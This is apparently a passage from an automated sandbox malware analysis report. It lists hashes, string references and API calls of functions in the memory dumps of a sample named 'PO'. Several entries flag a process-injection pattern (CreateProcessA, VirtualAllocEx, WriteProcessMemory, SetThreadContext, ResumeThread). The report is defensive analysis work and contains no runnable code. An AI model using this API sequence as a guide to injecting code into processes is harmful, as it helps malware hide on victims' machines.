Opcode Fuzzy Hash: e00cfc60dca68f0334699df68bbfa5f6ecc7ad36e70292629b8be41da508231f
Instruction Fuzzy Hash: D522E471D10A1ACECB11EF69C8506D9FBB5FF99300F1086AAD549B7210EB70AAD5CF80

Function 070E2C09 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f63490e163b04b358ae57afaebf758f81401a2da432b45722dcc22dee178e2d
Instruction ID: 7d23f57c57b79998c1cea4b8da570a9313dc19fed3089d13849027630ffd7824
Opcode Fuzzy Hash: 3f63490e163b04b358ae57afaebf758f81401a2da432b45722dcc22dee178e2d
Instruction Fuzzy Hash: 0302E271D10A2ACECB11EF68C8506D9FBB5FF99300F1186AAD54977210EB70AAD5CF80

Function 070E61BC Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033808d368c9bfb182fb49d7afdcd56f5ccf5043d2e66b6958e659a2d517ed54
Instruction ID: e5ecf483673915f8e069c731371603ba09c4cded1945e90927163a8445743807
Opcode Fuzzy Hash: 033808d368c9bfb182fb49d7afdcd56f5ccf5043d2e66b6958e659a2d517ed54
Instruction Fuzzy Hash: 30C19EB4E24219DFCB18CFA5D8804EEFFB6FF8A310F10952AD455AB250DB34A906CB51

Function 070E96D0 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc2540c136f52cc958cff125f043e57406b7aec06dc50065eb2e0c3d52cfc2db
Instruction ID: 49ce99f344e59334696104f5fd5b68618e89ae3d6d0b769447201639a246d494
Opcode Fuzzy Hash: dc2540c136f52cc958cff125f043e57406b7aec06dc50065eb2e0c3d52cfc2db
Instruction Fuzzy Hash: 5F9158B4D24219EFCB08CFE5D88089EFBB6FF8A310F10952AD455AB264D734A906CF11

Function 070E99AB Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d891e61f1902858937ca56c75a0e487a6a26a6375fb5c160e2d7e2840370e65
Instruction ID: e46d4a854f96dc20733a1c20f03bd41be8c4b4fcac30b300724e4142f1ae10c4
Opcode Fuzzy Hash: 0d891e61f1902858937ca56c75a0e487a6a26a6375fb5c160e2d7e2840370e65
Instruction Fuzzy Hash: 38714BB4D2421AEFCB18CFE4D88089EFBB6FF8A310F109526D055AB265D734A946CB11

Function 07A57B32 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cc4d81f22852a37130450ba2f2bf2cc667d7a491eed674056144863f0db3ad
Instruction ID: 42e668ac1796eb7ab6b6fd01ab40eab043c1a2a691b7a0b97d9c689f7098620a
Opcode Fuzzy Hash: e7cc4d81f22852a37130450ba2f2bf2cc667d7a491eed674056144863f0db3ad
Instruction Fuzzy Hash: EBD09EB881D258CBC745DF64D4445F9F7F9BB4F310F403155D81AA3221D7319981CE05

Function 070E4328 Relevance: 8.1, Strings: 6, Instructions: 554
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 070E4734
LR]q, xrefs: 070E469D
$]q, xrefs: 070E46FC
$]q, xrefs: 070E4395
$]q, xrefs: 070E46F0
(aq, xrefs: 070E47B0

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: (aq$LR]q$PH]q$$]q$$]q$$]q
API String ID: 0-1937764415
Opcode ID: f50268f6ad4032d0ff1eceadb3281b9fb6a974c3dd4ab7ae32c6d6eec80710fe
Instruction ID: b953ec03bc83c2f71fae915b0f6470c4a3023b00be50f0d539fe547c47c8a959
Opcode Fuzzy Hash: f50268f6ad4032d0ff1eceadb3281b9fb6a974c3dd4ab7ae32c6d6eec80710fe
Instruction Fuzzy Hash: A6228F747045058FDB08DF65D499AAD7BF6FF88700F108219F9069B3A9CB76AD82CB81

Function 070E8398 Relevance: 7.7, Strings: 6, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 070E8500
LR]q, xrefs: 070E856F
LR]q, xrefs: 070E857D
$]q, xrefs: 070E8510
LR]q, xrefs: 070E843A
LR]q, xrefs: 070E8448

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
API String ID: 0-2875722158
Opcode ID: 5c742acbbecfaf42ae6e5ec66f56351abc251ff68fc49a91344b5c7e6d057627
Instruction ID: 5cce7a459555551a147ce906d1375e7fc2099374d75a19cdd649f33cce9b2541
Opcode Fuzzy Hash: 5c742acbbecfaf42ae6e5ec66f56351abc251ff68fc49a91344b5c7e6d057627
Instruction Fuzzy Hash: A471CFF1A14119CFCB148BA9D4547BDBBF9EB4A300F14EA66E066BB2D1CB74DC408B61

Function 070E4301 Relevance: 5.2, Strings: 4, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 070E4734
LR]q, xrefs: 070E469D
$]q, xrefs: 070E4395
$]q, xrefs: 070E46F0

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: LR]q$PH]q$$]q$$]q
API String ID: 0-3307124116
Opcode ID: 5e414f98e66a0e096de10f0c60a1990ee55eb64ce60e1936fd5e5154367b60ad
Instruction ID: 2599f8320b94200478a9c685ff97a5ad603b1cfff409c4e67411468b6f970766
Opcode Fuzzy Hash: 5e414f98e66a0e096de10f0c60a1990ee55eb64ce60e1936fd5e5154367b60ad
Instruction Fuzzy Hash: 657180B0B002868FDB58CF69C9947ADBBF6AF89300F148669F446DB3A5DB34D841CB51

Function 070E8387 Relevance: 3.9, Strings: 3, Instructions: 179COMMON

Download Yara Rule

Strings

$]q, xrefs: 070E8500
LR]q, xrefs: 070E856F
LR]q, xrefs: 070E843A

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q
API String ID: 0-2603884067
Opcode ID: 61b4c498271bf4dad27afc15800406138a38981faa5228f513e29c7939d16f4d
Instruction ID: d444af77f7b7f5c5558c48a1c038b9713b4ba7ede91aafbf8e5c9ccd1ecd1bec
Opcode Fuzzy Hash: 61b4c498271bf4dad27afc15800406138a38981faa5228f513e29c7939d16f4d
Instruction Fuzzy Hash: F861D0F1E18115CFCB148BA8D4447BDBBF9EB46301F18EB66E065BB2D2C77498408B61

Function 070ED1DA Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

Te]q, xrefs: 070ED36D
Te]q, xrefs: 070ED311

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 038079aa6402da1c02a4c6e61382eb1d5da19b2f52c8238f291d9d3f2f8a3ea7
Instruction ID: 24bc8ec9be8122b67d4ff3d5e87c88295b482373df83a8e6aec2f0fa618687aa
Opcode Fuzzy Hash: 038079aa6402da1c02a4c6e61382eb1d5da19b2f52c8238f291d9d3f2f8a3ea7
Instruction Fuzzy Hash: 226160B4E082498FCB09CFE9C9456EDBFB6FF8A300F14816AD419AB366D7745906CB50

Function 070ED220 Relevance: 2.7, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

Te]q, xrefs: 070ED36D
Te]q, xrefs: 070ED311

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: a9fd0fffc6067fe608ee204d7fd7364f33fb0441fbee2f45e2b74420d8265eec
Instruction ID: 7bb539b236f622d78cef522c7f4501485cfbd681cc2ffc0901a2bbe9aa4b6c28
Opcode Fuzzy Hash: a9fd0fffc6067fe608ee204d7fd7364f33fb0441fbee2f45e2b74420d8265eec
Instruction Fuzzy Hash: 7A61D4B4E14209CFDB08CFA9C984AEDBBFAFF89300F109529D419AB355DB709905CB50

Function 07A53F5C Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A5419E

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6a8c36bc07f25bc808daab01d32aad852fbcfd7003a9b79dda4c75543311388b
Instruction ID: e1e2b868fd4ba86521960cea34c70428954d9a71e849f43f15a95b5693c84368
Opcode Fuzzy Hash: 6a8c36bc07f25bc808daab01d32aad852fbcfd7003a9b79dda4c75543311388b
Instruction Fuzzy Hash: 0CA18DB1D0065ADFDB24CF69C841BEDBBB2BF88310F148569D818A7280DB749985CF92

Function 07A53F68 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A5419E

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 932d5596507add26e9b48e1cf2c950c8c61904015f7a3c7014d1c814da4d11f6
Instruction ID: ddea8f4d5a49210095ef4cc89d838b6f7ba8616369052cbdc1c7a17a33258a2e
Opcode Fuzzy Hash: 932d5596507add26e9b48e1cf2c950c8c61904015f7a3c7014d1c814da4d11f6
Instruction Fuzzy Hash: C0919FB1D0065ADFDF24CF69C8417EDBBB2BF88310F148569D818A7280DB759985CF92

Function 00FC5CFC Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00FC5DB9

Memory Dump Source

Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_PO.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0a640aa97e7049c1d9de7fafc5ef1af3ee274e42948d053ed487859f1e01fa22
Instruction ID: 21797eda17fe960e4c6688b36c3819193fad27176613ecb445aeb8a334594c33
Opcode Fuzzy Hash: 0a640aa97e7049c1d9de7fafc5ef1af3ee274e42948d053ed487859f1e01fa22
Instruction Fuzzy Hash: C24112B0C00719CBDB24DFA9C944BDDBBF5BF48704F20806AD418AB255DB756986CF91

Function 00FC4850 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00FC5DB9

Memory Dump Source

Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_PO.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6d87c51c92015619a17c2b699fba74e77b2897d49bc556178d9d44c8562bdf14
Instruction ID: d9469e68f7f3780c532c805afdb5943b07210a63fdf245acc3c3939e7270309a
Opcode Fuzzy Hash: 6d87c51c92015619a17c2b699fba74e77b2897d49bc556178d9d44c8562bdf14
Instruction Fuzzy Hash: 9C4123B0C0071DCBDB24DFA9C944B8DBBF6BF48704F20806AD419AB255DB756986CFA0

Function 07A53CD9 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A53D70

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7ba1bd9e23e0f89165bd2f9afed21d032022147d8272a1a29caa9412e1c456af
Instruction ID: 141ce6b59dba50da7740092fb78aa56c91179fb6b13c687aba03eb182d12d8b0
Opcode Fuzzy Hash: 7ba1bd9e23e0f89165bd2f9afed21d032022147d8272a1a29caa9412e1c456af
Instruction Fuzzy Hash: DE214BB69013499FDB10DFA9C841BEEBFF5FF49314F108829E919A7250C7789940CBA0

Function 05B73D5C Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05B7436D,?,?), ref: 05B7441F

Memory Dump Source

Source File: 00000007.00000002.2162458931.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5b70000_PO.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 759d7bd29cfa64c442b483d212159d9dad9084fea11ac9e276baf775735f4b04
Instruction ID: fc3b5905183ceedcb562707284e22005dbc947d1e130d70db7fd086bf23c1501
Opcode Fuzzy Hash: 759d7bd29cfa64c442b483d212159d9dad9084fea11ac9e276baf775735f4b04
Instruction Fuzzy Hash: 6E31C3B590030D9FDB10DF9AD884ADEFBF5FB58310F14846AE919A7210D775A944CFA0

Function 07A53CE0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A53D70

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c88a0a8064558c6e48573b7f97f6c1476f99f70590206c39c88c3cc15fe88597
Instruction ID: 6e14fd4a50e432d45e26017069bccaad5e6754ebb922304a0397f76285cde00a
Opcode Fuzzy Hash: c88a0a8064558c6e48573b7f97f6c1476f99f70590206c39c88c3cc15fe88597
Instruction Fuzzy Hash: F4213BB69003499FCF10DFA9C845BEEBBF5FF88314F108829E919A7240C7789944CBA0

Function 07A53B40 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A53BC6

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ed7d0f33fe2eb27ad50105972106f99e7d180a50dca02fa784403034f5b60731
Instruction ID: 18631344bcb077e672351e691aa83f0923c496e6c8e53455481beea980c3f9dc
Opcode Fuzzy Hash: ed7d0f33fe2eb27ad50105972106f99e7d180a50dca02fa784403034f5b60731
Instruction Fuzzy Hash: A0213CB5D003099FDB10DFAAC4857EEBFF4EF89324F14842AD859A7241CB789545CBA1

Function 05B74380 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05B7436D,?,?), ref: 05B7441F

Memory Dump Source

Source File: 00000007.00000002.2162458931.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5b70000_PO.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 7f664604f21eecf880e630ec334bdc85b1f867a4e973e38dcdacf1b4260b5b67
Instruction ID: 9c25db8e028250c3aa6d3d727f39e1a957b1f339092ed38134b9dc8847d860d2
Opcode Fuzzy Hash: 7f664604f21eecf880e630ec334bdc85b1f867a4e973e38dcdacf1b4260b5b67
Instruction Fuzzy Hash: C621D2B5D0020A9FDB10CF9AD9846DEFBF5FF48320F14842AE919A7210D774A944CFA0

Function 07A53DC9 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A53E50

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 306b6f7725f9f9d5620f3938929db12df3a3e98297fbbb8ea3052609028f392f
Instruction ID: 83f65607cbddbd06b6631c64a238862ef19f56296a5423c2b7b9b796807c0902
Opcode Fuzzy Hash: 306b6f7725f9f9d5620f3938929db12df3a3e98297fbbb8ea3052609028f392f
Instruction Fuzzy Hash: 862105B18002599FDB10DFAAC881BEEFBF5FF48310F50842AE959A7250C7789940CBA1

Function 00FCC2E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FCDE16,?,?,?,?,?), ref: 00FCDED7

Memory Dump Source

Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_PO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 940644a3802c82ca044668e33653434b81dee6debdeb8bedb0522d3151e2dfc0
Instruction ID: b1b87f81d8a05480218033ba4a0edf0454eb1de7051f0615653a5918eee4051d
Opcode Fuzzy Hash: 940644a3802c82ca044668e33653434b81dee6debdeb8bedb0522d3151e2dfc0
Instruction Fuzzy Hash: BE21E6B5D002099FDB10CF9AD985AEEBBF5FB48310F14841AE914B7350D378A950DFA4

Function 07A53DD0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A53E50

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8f43df49f1a30db5639fdc4f62209ef78731349f35c2839fd577e55fcba25936
Instruction ID: 69bc5e0ddadaf6ed12af169a7643a091f73d005d4a4bdc912105fa2708c3d9b1
Opcode Fuzzy Hash: 8f43df49f1a30db5639fdc4f62209ef78731349f35c2839fd577e55fcba25936
Instruction Fuzzy Hash: 3321F8B1C002599FDB10DFAAC885AEEFBF5FF48310F50842AE919A7250C7789544DBA1

Function 07A53B48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A53BC6

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f722ff3295d78b8aa0ddc8e1789e65f04d3acbd2f1f96993f24e1933de5765ad
Instruction ID: 2ec95d47806b68609737f44571dfacd0752f636760b3df2a1dfde9a6b0c741e7
Opcode Fuzzy Hash: f722ff3295d78b8aa0ddc8e1789e65f04d3acbd2f1f96993f24e1933de5765ad
Instruction Fuzzy Hash: D72149B1D003099FDB10DFAAC4857EEBBF4EF88314F10842AD419A7240CB78A944CFA0

Function 07A53C18 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A53C8E

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ed9338aa9d3e4b81d34af0dd80127e632fa0fd34b1352dafeaa30f3c6bac4edd
Instruction ID: bc1c2a21bd061c00d4750cfc5dd2725b58f8b28dc9b3f6878da1ab0653b23cca
Opcode Fuzzy Hash: ed9338aa9d3e4b81d34af0dd80127e632fa0fd34b1352dafeaa30f3c6bac4edd
Instruction Fuzzy Hash: 1E1129B68002499FDB10DFAAC845AEEFFF5EF88314F108819E919A7250C779A554CBA1

Function 00FCA908 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FCB839,00000800,00000000,00000000), ref: 00FCBA4A

Memory Dump Source

Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_PO.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e455ec22f0122b8d931af1a843fb22e00e8c9c1c069890cecb127fe36d57299
Instruction ID: d31ebf7e8fbda3a1ba5a2bafabffe697b9cf045c98500b2600bcdecc26ce0d78
Opcode Fuzzy Hash: 6e455ec22f0122b8d931af1a843fb22e00e8c9c1c069890cecb127fe36d57299
Instruction Fuzzy Hash: CD1114B6D002099FDB10DF9AC545B9EFBF8EB48310F10842EE919B7200C379A945CFA5

Function 07A53A90 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07A53AFA

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4118cb305427271e9cac0de1a121a0c561a4d21977de6c0484cdb415c8af84b7
Instruction ID: 1e2af341b7294bac300f4bc62528201f338ab32e20f47a718f1261a434bfd102
Opcode Fuzzy Hash: 4118cb305427271e9cac0de1a121a0c561a4d21977de6c0484cdb415c8af84b7
Instruction Fuzzy Hash: B81149B59003498FDB20DFAAC4457EEFFF5EF89314F10841AD919A7240CB79A540CBA4

Function 07A53C20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A53C8E

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f11e656061dc49f11c9e1935fb94e84695ce93f4a77188a6d7bee505884266d4
Instruction ID: 23fe79a5fa89aafc54f7e6ada1d0d9d3467bd66b03ec63309a627bb1bb28314f
Opcode Fuzzy Hash: f11e656061dc49f11c9e1935fb94e84695ce93f4a77188a6d7bee505884266d4
Instruction Fuzzy Hash: E71137B68002499FCB10DFAAC844AEEFFF5EF88314F108819E519A7250C779A554CFA0

Function 07A53A98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07A53AFA

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2e7764d2a2633795874416e768cac81dbff429f06bb2aafd37197e203e835760
Instruction ID: 695bf17c78a1fa2aea76cd1c763593f89eb5c4d077a50e145b59ec5daf8dc47a
Opcode Fuzzy Hash: 2e7764d2a2633795874416e768cac81dbff429f06bb2aafd37197e203e835760
Instruction Fuzzy Hash: DF113AB5D002498FDB10DFAAC4457EEFBF5EF88314F208819D519A7240CB79A544CBA4

Function 00FCB758 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00FCB7BE

Memory Dump Source

Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_PO.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d4362c46b28445a9d751a10683766822b065b881af788fbc72f022962608db28
Instruction ID: f29c902c3362a50b0f8b24b743c169e86693002ebcc73fca162ca2aecfcf5a10
Opcode Fuzzy Hash: d4362c46b28445a9d751a10683766822b065b881af788fbc72f022962608db28
Instruction Fuzzy Hash: BD11DFBAC002498FDB10DF9AC549B9EFBF9AF88324F10841AD819A7610C379A545CFA1

Function 07A5592C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07A589DD

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9af5692b182b6e6386942791f63d0a9b072f8b358c52fcd2923779c4099466d9
Instruction ID: 313b936960ea4fe5f54eff69c23bb29ed70426cd3189ec3fda30e405f0083544
Opcode Fuzzy Hash: 9af5692b182b6e6386942791f63d0a9b072f8b358c52fcd2923779c4099466d9
Instruction Fuzzy Hash: 4811C2B5800349DFDB10DF9AD845BDEBBF8EB49324F10885AE958A7200D379A944CFA5

Function 07A58978 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07A589DD

Memory Dump Source

Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7a50000_PO.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: bf3d345a872f60a576c4dce72e645ea68de6dd644c4deb2fd0d377a2bfb33721
Instruction ID: b1c43fe1d0a824400251218ede3092804ae241a241a3e498567696a25b1d8367
Opcode Fuzzy Hash: bf3d345a872f60a576c4dce72e645ea68de6dd644c4deb2fd0d377a2bfb33721
Instruction Fuzzy Hash: AB1125B5800289DFDB10DF99C485BDEBFF4EB49320F10854AE868A7250C379A944CFA1

Function 070E73F0 Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

V, xrefs: 070E7470

Memory Dump Source

